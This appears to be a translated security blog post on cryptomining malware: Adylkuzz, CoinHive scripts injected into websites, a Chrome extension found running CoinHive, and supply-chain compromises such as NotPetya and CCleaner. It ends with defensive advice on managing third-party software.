Malware, cryptocurrencies, and providers

While 2016 saw the explosion of ransomware, Another family of malware has been appearing frequently in mass attacks for some time now: cryptominers.

The operating principle is simple and answers the question: "Why wait for the hypothetical payment of a ransom when you can directly exploit a victim's resources to generate income?" By exploiting the principle of mining, which rewards the community with cryptocurrency for transaction verification operations carried out.

In particular, the malware Adylkuzz discovered last May exploited the attack ETERNAL BLUE to establish a presence on servers exposed to the internet and mine cryptocurrency Monero.

More recently, the site CoinHive made available to the public a program developed in JavaScript that allows mining Monero. While the code itself is not malicious, the prevalence of JavaScript on the web quickly led to attacks injecting the script into web pages to exploit visitors' browsers and mine this cryptocurrency without their knowledge. Two main types of scenarios have been identified:

• Malicious actors deploying the script on a victim site, either by directly exploiting a vulnerability or through an advertising network; ;
• Webmasters voluntarily install the program to generate additional revenue from visits to their site.

We identified a third case during a routine investigation. A Chrome extension (Short URL (goo.gl), (fortunately not very widespread) has included a file since its latest version bit.js containing the JavaScript program of CoinHive, and appears to run it continuously as long as the extension is active.

Even though the malicious activity here is small-scale and only results in excessive CPU usage for the victims, it seems interesting in a context evolving towards targeted attacks on suppliers. The extension Web Developer For example, Chrome was targeted a few weeks ago and carried malicious code for a few days. On a different scale, the infection NotPetya had spread through the compromise of the software vendor's update system ME Docs. Finally, the attack distributing versions backdoored of CCleaner initially discovered two weeks ago had potentially affected millions of users but ultimately targeted only a limited number of companies.

These events highlight the importance of having a clear view of the third-party solutions installed on an information system in order to assess the impact of a compromise of these products. Guaranteeing the security of an element over which the company does not have complete control is impossible, but measures can still be implemented to reduce the attack surface, segment systems, and facilitate response during an incident. To conclude and return to NotPetya, adhering to "basic" hygiene rules on the segregation of privileged accounts was sufficient to neutralize the main effects of the malware.